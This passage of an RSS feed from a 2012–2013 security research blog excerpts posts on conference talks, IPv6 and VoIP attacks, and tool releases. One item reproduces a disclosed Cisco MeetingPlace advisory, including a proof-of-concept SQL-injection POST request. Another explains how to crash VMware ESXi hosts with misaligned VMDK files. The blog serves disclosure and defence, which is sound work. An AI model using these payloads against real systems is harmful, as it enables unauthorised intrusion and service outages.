      <description>&lt;h3 id=&#34;this-is-a-guest-post-from-david-weinstein&#34;&gt;This is a guest post from &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-presentations/index.html#corporate_espionage_via_mobile_compromise&#34;&gt;David Weinstein&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;Mobile devices play an important role in the business world. Yet with increased emphasis on the Bring Your Own Device (BYOD) model, defenses are not where they need to be to slow the loss of valuable intellectual property.&lt;/p&gt;&#xA;&lt;p&gt;Corporate defenses have traditionally focused on the network, the endpoints, and not necessarily on the ecosystem of how these devices interact outside of network sockets. Smartphones bring unique network connectivity, an array of sensors, and can be overlooked by resources invested on IDS/IPS not being effectively leveraged.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Paparazzi over IP – Slides</title>
      <link>https://insinuator.net/2013/02/paparazzi-over-ip-slides/</link>
      <pubDate>Mon, 18 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/paparazzi-over-ip-slides/</guid>
      <description>&lt;p&gt;We are back from ShmooCon had a great time and it was a lot of fun talking to all of you guys. Here are the &lt;a href=&#34;https://www.ernw.de/download/publikationen/PaparazzioverIP_shmoo2013.pdf&#34;&gt;slides&lt;/a&gt; of our talk. Thanks to all who made this possible, we really enjoyed being part of this years Shmoo.&lt;/p&gt;&#xA;&lt;p&gt;cheers&lt;/p&gt;&#xA;&lt;p&gt;/daniel and pascal&lt;/p&gt;</description>
    </item>
    <item>
      <title>Apple iOS and the history of a workin’ lockscreen… NOT</title>
      <link>https://insinuator.net/2013/02/apple-ios-and-the-history-of-a-workin-lockscreen-not/</link>
      <pubDate>Sun, 17 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/apple-ios-and-the-history-of-a-workin-lockscreen-not/</guid>
      <description>&lt;p&gt;Once again a vulnerability in Apples mobile operating system iOS was found by some guys of the Jailbreak Nation. The newest version of this operating system suffers from a weakness that makes it possible to unlock the lockscreen of all iPhones that use iOS version 6.1. In this case it does not matter whether a PIN or a password is used to unlock the phone. After successful exploitation an attacker is able to see and edit contact-information, to add new contacts to the phonebook, to view all pictures, to call the inbox or any of the contacts and to see and delete the list of recent calls or parts of it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Extension Headers: New Features, and New Attack Vectors</title>
      <link>https://insinuator.net/2013/02/ipv6-extension-headers-new-features-and-new-attack-vectors/</link>
      <pubDate>Sun, 17 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/ipv6-extension-headers-new-features-and-new-attack-vectors/</guid>
      <description>&lt;h3 id=&#34;this-is-a-guest-post-from-antonios-atlasis&#34;&gt;This is a guest post from &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-presentations/index.html#extension_headers&#34;&gt;Antonios Atlasis&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;IPv6 introduces a lot of new features and consequently, a lot of new capabilities. Obviously, the most significant of them is the huge address space that it offers. However, this is not the only one. IPv6 also introduces the use of the IPv6 Extension Headers. The IPv6 header has been considerably simplified in comparison with IPv4 one. On the other hand, the IPv6 Extension Headers, not only do the “job” of most of the fields which were removed from the main header, but, additionally, they add many more. However, any new “technology” creates new attack opportunities and a “new” protocol, such as IPv6 could not be an exception, especially since its design and implementation is more complicated than it’s predecessor.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Paparazzi over IP</title>
      <link>https://insinuator.net/2013/02/paparazzi-over-ip/</link>
      <pubDate>Fri, 15 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/paparazzi-over-ip/</guid>
      <description>&lt;p&gt;Almost every higher class DSLR on the market today features multiple and complex access technologies. To name a few, canons new flagship features IP connectivity wired via 802.3 as well as wireless via 802.11. All the big vendors are pushing these features to the market and advertise them with real time image transfer to the cloud. We have taken a look at the layer 2 and 3 implementations in the CamOS and the services running upon those, so here is what we found while examine the EOS 1D X:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Mobile Application Testing</title>
      <link>https://insinuator.net/2013/02/mobile-application-testing/</link>
      <pubDate>Thu, 14 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/mobile-application-testing/</guid>
      <description>&lt;p&gt;Our new &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-2-day-workshop-mobile-application-testing/index.html&#34;&gt;workshop about mobile application testing&lt;/a&gt;, held for the 1st time at the Troopers conference 2013, is coming closer. So I would like to take the opportunity and post an appetizer for those who are still undetermined if they should attend the workshop ;-).&lt;/p&gt;&#xA;&lt;p&gt;While the topic of mobile application testing is a wide field that may contain reverse engineering, secure storage analysis, vulnerability research, network traffic analysis and so forth, in the end of the day you have to answer one question: Can I trust this application and run it on my enterprise devices? So first you have to define some criteria, which kind of behavior and characteristics of an application you regard as trustworthy (or not). Let us peek at malware … besides harming your devices and data, malware is typically:&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS13: TelcoSecDay, IPv6 Security Summit and some more Updates</title>
      <link>https://insinuator.net/2013/02/troopers13-telcosecday-ipv6-security-summit-and-some-more-updates/</link>
      <pubDate>Sat, 02 Feb 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/02/troopers13-telcosecday-ipv6-security-summit-and-some-more-updates/</guid>
      <description>&lt;p&gt;Here’s a number of updates as for upcoming &lt;a href=&#34;https://www.troopers.de/&#34;&gt;TROOPERS13&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The preliminary agenda for this year’s TelcoSecDay can be found &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-telcosec-day-2013/index.html&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/index.html&#34;&gt;Here&lt;/a&gt;‘s the (again: preliminary) agenda of the IPv6 Security Summit.&lt;/p&gt;&#xA;&lt;p&gt;Last, but not least we’ve included another four talks in the main conference:&lt;/p&gt;&#xA;&lt;p&gt;======&lt;/p&gt;&#xA;&lt;p&gt;Sergey Bratus &amp;amp; Travis Goodspeed: You wouldn’t share a syringe. Would you share a USB port?&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: Previous work has shown that a USB port left unattended may be subject to pwnage via insertion of a device that types into your command shell (e.g. &lt;a href=&#34;http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)#Teensy_USB_HID_Attack_Vector&#34;&gt;here&lt;/a&gt;). Impressive attack payloads have been delivered over USB to &lt;a href=&#34;http://arstechnica.com/gaming/2010/08/the-ps3-jailbroken-usb-hack-allows-homebrew-copied-games/&#34;&gt;jailbreak PS3&lt;/a&gt; and a “&lt;a href=&#34;https://www.usenix.org/sites/default/files/conference/protected-files/michele_woot12_slides.pdf&#34;&gt;smart TV&lt;/a&gt;“. Not surprisingly, USB stacks started incorporating defenses such as device registration, USB firewalls, and other protective kits. But do these protective measures go far enough to let you safely plug in a strange thumb drive into your laptop’s USB port?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Fragmentation (overlapping) attacks in IPv6. Have we learned our lesson, yet?</title>
      <link>https://insinuator.net/2013/01/fragmentation-overlapping-attacks-in-ipv6.-have-we-learned-our-lesson-yet/</link>
      <pubDate>Tue, 29 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/fragmentation-overlapping-attacks-in-ipv6.-have-we-learned-our-lesson-yet/</guid>
      <description>&lt;h3 id=&#34;this-is-a-guest-post-from-antonios-atlasis&#34;&gt;This is a guest post from &lt;a href=&#34;https://www.troopers.de/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-presentations/index.html#extension_headers&#34;&gt;Antonios Atlasis&lt;/a&gt;&lt;/h3&gt;&#xA;&lt;p&gt;It has been a year since fragmentation attacks in IPv6 were last examined publicly (in &lt;a href=&#34;https://media.blackhat.com/bh-eu-12/Atlasis/bh-eu-12-Atlasis-Attacking_IPv6-Slides.pdf&#34;&gt;Black Hat Europe 2012&lt;/a&gt;). Issues well known from the IPv4 era appeared again in IPv6. Surprisingly enough, some of the most popular Operating Systems (OS), included ones considered “secure”, were proven to be vulnerable to such attacks, although fragmentation overlapping is strictly forbidden in IPv6 since 2009 (RFC5722). Some other OS, although in a better shape, still appeared to have some issues in specific cases.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2013 – Third Round of Talks Selected</title>
      <link>https://insinuator.net/2013/01/troopers-2013-third-round-of-talks-selected/</link>
      <pubDate>Thu, 17 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/troopers-2013-third-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re very happy to announce the third round of Troopers 2013 talks today (first round &lt;a href=&#34;http://www.insinuator.net/2012/12/troopers-2013-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;, second &lt;a href=&#34;http://www.insinuator.net/2013/01/troopers-2013-second-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;So much quality stuff… it seems to get (ever) better every year ;-).&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Michael Ossmann &amp;amp; Dominic Spill: Introducing Daisho – monitoring multiple communication technologies at the physical layer.&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Synopsis:&lt;/strong&gt; Most communications media can be monitored and debugged at various levels of the stack, but we believe that it is most important to examine them at the physical layer. From there, the security of every level can be investigated and tested. The task of monitoring physical layer communications has become increasingly difficult as we try to squeeze more and more bandwidth out of our links. A passive tapping circuit can be used to monitor a 100BASE-TX connections, but no such circuit exists for 1000BASE-T networks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2013 – Second Round of Talks Selected</title>
      <link>https://insinuator.net/2013/01/troopers-2013-second-round-of-talks-selected/</link>
      <pubDate>Thu, 10 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/troopers-2013-second-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re very happy to announce the second round of Troopers 2013 talks today (first round &lt;a href=&#34;http://www.insinuator.net/2012/12/troopers-2013-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;).&lt;br&gt;&#xA;Some (well, actually most ;-)) of these talks haven’t been presented before, at any other occasion, so this is exciting fresh material which was/is prepared especially for &lt;a href=&#34;https://www.troopers.de/agenda13/index.html&#34;&gt;Troopers&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Andreas Wiegenstein &amp;amp; Xu Jia: Ghost in the Shell.&lt;/strong&gt; &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Synopsis:&lt;/strong&gt; Security conferences in the past years have made it clear, that common security vulnerabilities such as SQL Injection, XSS, CSRF, HTTP verb tampering and many others also exist in SAP software. This talk covers several vulnerabilities that are unique to SAP systems and shows how these can be used in order to bypass crucial security mechanisms and at the same time operate completely below the (forensic) Radar. We uncovered undocumented mechanisms in the SAP kernel, that allow launching attacks that cannot be traced back to the attacker by forensic means. These mechanisms allow to *actively* inject commands at any time into the running backend-session of an arbitrary logged on user, chosen by the attacker. We named this attack mechanism “Ghost in the Shell”. We will also demo how to use this attack vector to distribute malware to the attacked user’s client machine despite mechanisms in the SAP standard that are designed to prevent this.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analysis of Rails XML Parameter Parsing Vulnerability</title>
      <link>https://insinuator.net/2013/01/analysis-of-rails-xml-parameter-parsing-vulnerability/</link>
      <pubDate>Tue, 08 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/analysis-of-rails-xml-parameter-parsing-vulnerability/</guid>
      <description>&lt;p&gt;This post tries to give an overview about the background and impact of the &lt;a href=&#34;https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion&#34;&gt;new Rails XML parameter parsing vulnerability patched today&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h2 id=&#34;the-bug&#34;&gt;The bug&lt;/h2&gt;&#xA;&lt;p&gt;The root cause of the vulnerability is Rails handling of formatted parameters. In addition to standard GET and POST parameter formats, Rails can handle multiple different data encodings inside the body of POST requests. By default JSON and XML are supported. While support for JSON is widely used in production, the XML functionality does not seem to be known by many Rails developers.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Insider Threats in the Cloud</title>
      <link>https://insinuator.net/2013/01/insider-threats-in-the-cloud/</link>
      <pubDate>Sat, 05 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/insider-threats-in-the-cloud/</guid>
      <description>&lt;p&gt;at first a happy new year to all our readers!&lt;br&gt;&#xA;And, of course, to everybody else, too ;-). May 2013 bring good things for you all, in particular (but not only) in the infosec space.&lt;/p&gt;&#xA;&lt;p&gt;At the &lt;a href=&#34;http://www.acsac.org/&#34;&gt;recent ATSAC 2012 conference&lt;/a&gt; a guy from the CERT Insider Threat Center gave a talk on the exact topic. Given that the &lt;a href=&#34;http://www.enisa.europa.eu/activities/risk-management/files/deliverables/cloud-computing-risk-assessment/at_download/fullReport&#34;&gt;ENISA Cloud Computing Risk Assessment&lt;/a&gt; lists “Cloud Provider Malicious Insider” as one of the top eight risks (out of overall 35 risks evaluated) and we just had some discussion about this in a customer environment, this might be of interest for some readers.&lt;/p&gt;</description>
    </item>
    <item>
      <title>All Your Calls Are Still Belong to Us – continued</title>
      <link>https://insinuator.net/2013/01/all-your-calls-are-still-belong-to-us-continued/</link>
      <pubDate>Thu, 03 Jan 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/01/all-your-calls-are-still-belong-to-us-continued/</guid>
      <description>&lt;p&gt;Hi again and a happy new year 2013!&lt;/p&gt;&#xA;&lt;p&gt;Lets continue were I left you the last time.&lt;/p&gt;&#xA;&lt;h2 id=&#34;the-ctl&#34;&gt;The CTL&lt;/h2&gt;&#xA;&lt;p&gt;The CTL is basically a binary TLV file with 1 byte type, followed by 2 bytes length and finally the data. But as this is far to easy, some special fields omit the length field and just place the data after the type (I guess those are fields with a fixed length). Here is an example CTL file:&lt;/p&gt;</description>
    </item>
    <item>
      <title>All Your Calls Are Still Belong to Us – aka. Hacking Cisco high secure Enterprise VoIP Solution</title>
      <link>https://insinuator.net/2012/12/all-your-calls-are-still-belong-to-us-aka.-hacking-cisco-high-secure-enterprise-voip-solution/</link>
      <pubDate>Thu, 27 Dec 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/12/all-your-calls-are-still-belong-to-us-aka.-hacking-cisco-high-secure-enterprise-voip-solution/</guid>
      <description>&lt;p&gt;Some of you may have heard the topic before, as we have spoken about on this years &lt;a href=&#34;http://www.youtube.com/watch?v=hWe5zGfsN0g&#34;&gt;BlackHat Europe&lt;/a&gt;, &lt;a href=&#34;https://www.troopers.de/archives/troopers12/agenda12/troopers12-protecting-voice-over-ip-in-2012/index.html&#34;&gt;TROOPERS12&lt;/a&gt;  and &lt;a href=&#34;http://www.ustream.tv/recorded/21808461&#34;&gt;HES12&lt;/a&gt;, so this is nothing completely new, but as we’re done with responsible disclosure (finally (-; )  and all the stuff should be fixed, we’re going to publish the code that brought us there. I will split the topic into two blog posts, this one will wrap up the setup, used components and protocols, the next one [tbd. till EOY, hopefully] will get into detail on the tools and techniques we used to break the enterprise grade security.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2013 – First Round of Talks Selected</title>
      <link>https://insinuator.net/2012/12/troopers-2013-first-round-of-talks-selected/</link>
      <pubDate>Sun, 23 Dec 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/12/troopers-2013-first-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re delighted to provide the first announcement of talks of next year’s Troopers edition. Looks like it’s going to be a great event again 😉&lt;br&gt;&#xA;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Peter Kieseberg: Malicious pixels – QR-codes as attack vectors.&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;**Synopsis: **QR-Codes, a version of two-dimensional barcodes that are able to store quite large amounts of information, started gaining huge popularity throughout the last few years, including all sorts of new applications for them. Originating from the area of logistics, they found their ways into marketing and since the rise of modern smartphones with their ability to scan them in the street; they can be found virtually everywhere, often linking to sites on the internet. Currently even standards for paying using QR-codes were proposed and standardized. In this talk we will highlight possible attack vectors arising from the use of QR-Codes. Furthermore we will outline an algorithm for calculating near-collisions in order to launch phishing attacks and we will demonstrate the practical utilization of this technique.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Loki for Windows released</title>
      <link>https://insinuator.net/2012/11/loki-for-windows-released/</link>
      <pubDate>Thu, 08 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/11/loki-for-windows-released/</guid>
      <description>&lt;p&gt;Today is a great day, its the day, Loki finally runs on all big operating systems. Im proud to announce the first Loki release for Windows!&lt;/p&gt;&#xA;&lt;p&gt;There are a few things not working (yet / at all) under Windows. Those are:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;The WLCCP Module – ive not yet managed to build and link against asleap on windows [but time may help (-; ]&lt;/li&gt;&#xA;&lt;li&gt;TCP-MD5 Auth for BGP – This will never work, as Windows has no TCP-MD5 impl. in the kernel&lt;/li&gt;&#xA;&lt;li&gt;The MPLS Module – Had some hassle here with WinPcap, may be working in the future&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The most testing so far was done on Windows 7 were all the other functions work as they do on Linux and Mac.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection in Cisco MeetingPlace</title>
      <link>https://insinuator.net/2012/11/sql-injection-in-cisco-meetingplace/</link>
      <pubDate>Thu, 08 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/11/sql-injection-in-cisco-meetingplace/</guid>
      <description>&lt;p&gt;Cisco has released a &lt;a href=&#34;http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-mp&#34;&gt;security advisory&lt;/a&gt; for a vulnerability we discovered last year.&lt;br&gt;&#xA;For comparison here is our original advisory to cisco:&lt;/p&gt;&#xA;&lt;h5 id=&#34;security-advisory-for-cisco-unified-communications-solution&#34;&gt;Security Advisory for Cisco Unified Communications Solution&lt;/h5&gt;&#xA;&lt;h5 id=&#34;release-date-1182012-author-daniel-mende&#34;&gt;Release Date: 11/8/2012 Author: Daniel Mende&lt;/h5&gt;&#xA;&lt;h5 id=&#34;1-summary-multiple-critical-sql-injections-exist-in-cisco-unified-meeting-place&#34;&gt;1 SUMMARY Multiple critical SQL injections exist in Cisco unified meeting place.&lt;/h5&gt;&#xA;&lt;h5 id=&#34;2-affected-products-the-following-products-have-been-tested-as-vulnerable-so-far-cisco-unified-meetingplace-with-the-following-modules--meetingplace-agent-7119--meetingplace-audio-service-7118--meetingplace-gateway-sim-7112--meetingplace-replication-service-7119--meetingplace-master-service-7118--meetingplace-extension-7118--meetingplace-authentication-filter-7118&#34;&gt;2 AFFECTED PRODUCTS The following Products have been tested as vulnerable so far: Cisco Unified Meetingplace with the following modules: • MeetingPlace Agent 7.1.1.9 • MeetingPlace Audio Service 7.1.1.8 • MeetingPlace Gateway SIM 7.1.1.2 • MeetingPlace Replication Service 7.1.1.9 • MeetingPlace Master Service 7.1.1.8 • MeetingPlace Extension 7.1.1.8 • MeetingPlace Authentication Filter 7.1.1.8&lt;/h5&gt;&#xA;&lt;h5 id=&#34;3-details-the-following-parameters-are-affected-httpipmpwebscriptsmpxdll-post-parameter-wcrecurmtgid&#34;&gt;3 DETAILS The following parameters are affected: http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]&lt;/h5&gt;&#xA;&lt;h5 id=&#34;4-vulnerability-scoring-the-severity-rating-based-on-cvss-version-2-base-vector-avn--acl--aus--cp--ip--ap-cvss-version-2-score-65-severity-low&#34;&gt;4 VULNERABILITY SCORING The severity rating based on CVSS Version 2: Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P) CVSS Version 2 Score: 6.5 Severity: Low&lt;/h5&gt;&#xA;&lt;h5 id=&#34;5-proof-of-concept-post-mpwebscriptsmpxdll-http11-host-10xxx-user-agent-mozilla50-accept-texthtmlapplicationxhtmlxmlapplicationxmlq09q08-accept-language-en-usenq05-accept-encoding-gzip-deflate-accept-charset-iso-8859-1utf-8q07q07-proxy-connection-keep-alive-referer-http10xxxmpwebscriptsmpxdll-cookie-cookiestrue-content-type-applicationx-www-form-urlencoded-content-length-571&#34;&gt;5 PROOF OF CONCEPT POST /mpweb/scripts/mpx.dll HTTP/1.1 Host: 10.X.X.X User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://10.X.X.X/mpweb/scripts/mpx.dll Cookie: cookies=true Content-Type: application/x-www-form-urlencoded Content-Length: 571&lt;/h5&gt;&#xA;&lt;h5 id=&#34;sessionida40490a1-ab17-4c1e-ba4a-e3c5c90f62ca1ed59e5c-a774-4546-8683--aeb15d6fbd0d55931857-6296-48ec-9434-3231c683c47dadadfjadlkenmfhmplaihgkddg-wcmeetingidwcrecurmtgid-or-11-url0wcbasetpltxt0startseiteurl1-txt1url2txt2url3txt3url4txt4url5txt5mtgcattosearch-28all2bcategories29ml_publicpostedyesmtgidtosearch0000007schedulerid-wcrequestwchashformtypelistmeetingswcstate3stplwcfindmtgtplftpl-wcfindmtgtplml_listmt_todayml_endtime_monthml_endtime_dayml_end-time_yearml_showcontmtgsyessp_vlanguagelang999i00&#34;&gt;SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683- AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg &amp;amp;wcMeetingID=&amp;amp;wcRecurMtgID=‘ or 1=1 —&amp;amp;URL0=wcBase.tpl&amp;amp;TXT0=Startseite&amp;amp;URL1=&amp;amp; TXT1=&amp;amp;URL2=&amp;amp;TXT2=&amp;amp;URL3=&amp;amp;TXT3=&amp;amp;URL4=&amp;amp;TXT4=&amp;amp;URL5=&amp;amp;TXT5=&amp;amp;MtgCatToSearch= %28all%2Bcategories%29&amp;amp;ML_PublicPosted=Yes&amp;amp;MtgIDToSearch=0000007&amp;amp;SchedulerID= &amp;amp;wcRequest=&amp;amp;wcHash=&amp;amp;FormType=listmeetings&amp;amp;wcState=3&amp;amp;STPL=wcFindMtg.tpl&amp;amp;FTPL= wcFindMtg.tpl&amp;amp;ML_List=MT_Today&amp;amp;ML_EndTime_Month=&amp;amp;ML_EndTime_Day=&amp;amp;ML_End Time_Year=&amp;amp;ML_ShowContMtgs=Yes&amp;amp;SP_VLanguage=lang999i00&lt;/h5&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building — Denial of Service</title>
      <link>https://insinuator.net/2012/11/vmdk-has-left-the-building-denial-of-service/</link>
      <pubDate>Sat, 03 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/11/vmdk-has-left-the-building-denial-of-service/</guid>
      <description>&lt;p&gt;Almost all of our presentations and write-ups on the VMDK File Inclusion Vulnerability contained a slide stating something like&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;“we’re rather sure that DoS is possible as well ;-)”&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;including the following screenshot of the ESX purple screen of death:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2012/11/DOS_PoC_CoreDump.jpeg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2012/11/DOS_PoC_CoreDump.jpeg&#34; alt=&#34;&#34; title=&#34;DOS_PoC_CoreDump&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;So it seems like we still owe you that one — sorry for the delay! However the actual attack to trigger this purple screen was rather simple: Just include &lt;em&gt;multiple&lt;/em&gt; VMDK raw files that cannot be aligned with 512 Byte blocks — e.g. several files of 512 * X + [0 &amp;lt; Y &amp;lt; 512] Bytes. Writing to a virtual hard drive composed of such single files for a short amount of time (typically one to three minutes, this is what we observed in our lab) triggered the purple screen on both ESXi4 and ESXi5 — at least for a patch level earlier than Releasebuild-515841/March 2012: it seems like this vulnerability was patched in Patch &lt;a href=&#34;http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&amp;amp;cmd=displayKC&amp;amp;externalId=2010814&#34;&gt;ESXi500-201203201-UG&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Back from DayCon VI</title>
      <link>https://insinuator.net/2012/11/back-from-daycon-vi/</link>
      <pubDate>Thu, 01 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/11/back-from-daycon-vi/</guid>
      <description>&lt;p&gt;Two weeks ago we had a great time at &lt;a href=&#34;http://www.day-con.org&#34; title=&#34;DayCon&#34;&gt;Day-Con VI&lt;/a&gt;. Enno, Matthias, Rene, Frank and me traveled to Dayton, OH to give workshops and presentations. We started a tough week full of  &lt;a href=&#34;http://day-con.org/POOH.html&#34;&gt;workshops&lt;/a&gt; on Tuesday where Rene gave a deep inside look into the world of security on current mobile platforms. Matthias discussed security problems and possible design patterns of cloud environments in his Cloud &amp;amp; Virtualization Security Workshop before he gave a first insight into the world of reverse engineering on Wednesday. Frank and me taught the basics of hacking and pentesting in the &lt;a href=&#34;http://www.packetwars.com&#34;&gt;PacketWars&lt;/a&gt; bootcamp (comparable to the one at &lt;a href=&#34;https://www.troopers.de/troopers12/agenda/hacking-101-workshop/index.html&#34;&gt;TROOPERS&lt;/a&gt;), preparing the participants for the &lt;a href=&#34;http://packetwars.com/&#34; title=&#34;packetwars&#34;&gt;PacketWars&lt;/a&gt; on Saturday. Obviously we were not the only ones having a &lt;a href=&#34;http://msdaisysramblings.blogspot.de/2012/10/packetwars-and-daycon-exploding-my.html&#34;&gt;great time&lt;/a&gt; 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pytacle alpha1 released!</title>
      <link>https://insinuator.net/2012/10/pytacle-alpha1-released/</link>
      <pubDate>Wed, 31 Oct 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/10/pytacle-alpha1-released/</guid>
      <description>&lt;p&gt;Finally it’s here!&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.ernw.de/download/pytacle-alpha1.tar.gz&#34;&gt;pytacle&lt;/a&gt; is a tool inspired by &lt;a href=&#34;http://www.data.ks.uni-freiburg.de/download/masterarbeit/SS11/09-betz-gsm/&#34;&gt;tentacle&lt;/a&gt;. It automates the task of sniffing GSM frames of the air, extracting the key exchange, feeding &lt;a href=&#34;https://srlabs.de/decrypting_gsm/&#34;&gt;kraken&lt;/a&gt; with the key material and finally decode/decrypt the voice data. All You need is a &lt;a href=&#34;http://www.ettus.com/&#34;&gt;USRP&lt;/a&gt; (or similar) to capture the GSM band and a &lt;a href=&#34;git://git.srlabs.de/kraken.git&#34;&gt;kraken&lt;/a&gt; instance with the &lt;a href=&#34;http://opensource.srlabs.de/projects/a51-decrypt/files&#34;&gt;berlin tables&lt;/a&gt; (only about 2TB 😉 )&lt;/p&gt;&#xA;&lt;p&gt;I’ve posted a &lt;a href=&#34;http://www.insinuator.net/2011/12/pytacle-preview/&#34;&gt;preview&lt;/a&gt; before, take a look at the video to see the tool in action.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Update: Microsoft Advisory 2757760 Windows Internet Explorer Vulnerability</title>
      <link>https://insinuator.net/2012/09/update-microsoft-advisory-2757760-windows-internet-explorer-vulnerability/</link>
      <pubDate>Thu, 20 Sep 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/09/update-microsoft-advisory-2757760-windows-internet-explorer-vulnerability/</guid>
      <description>&lt;p&gt;Microsoft takes this vulnerability quite serious and was acting fast. The Microsoft Security Response Center announced the availability of a fix last night in the &lt;a href=&#34;http://blogs.technet.com/b/msrc/archive/2012/09/19/internet-explorer-fix-it-available-now-security-update-scheduled-for-friday.aspx&#34;&gt;MSRC Blog&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The fix will be available via Windows Update on friday, the 21st of september. So it’s time to get ready for this update ;-).&lt;/p&gt;&#xA;&lt;p&gt;Have a nice day&lt;br&gt;&#xA;Michael&lt;/p&gt;</description>
    </item>
    <item>
      <title>Microsoft Advisory 2757760: Windows Internet Explorer Zero-Day Vulnerability</title>
      <link>https://insinuator.net/2012/09/microsoft-advisory-2757760-windows-internet-explorer-zero-day-vulnerability/</link>
      <pubDate>Wed, 19 Sep 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/09/microsoft-advisory-2757760-windows-internet-explorer-zero-day-vulnerability/</guid>
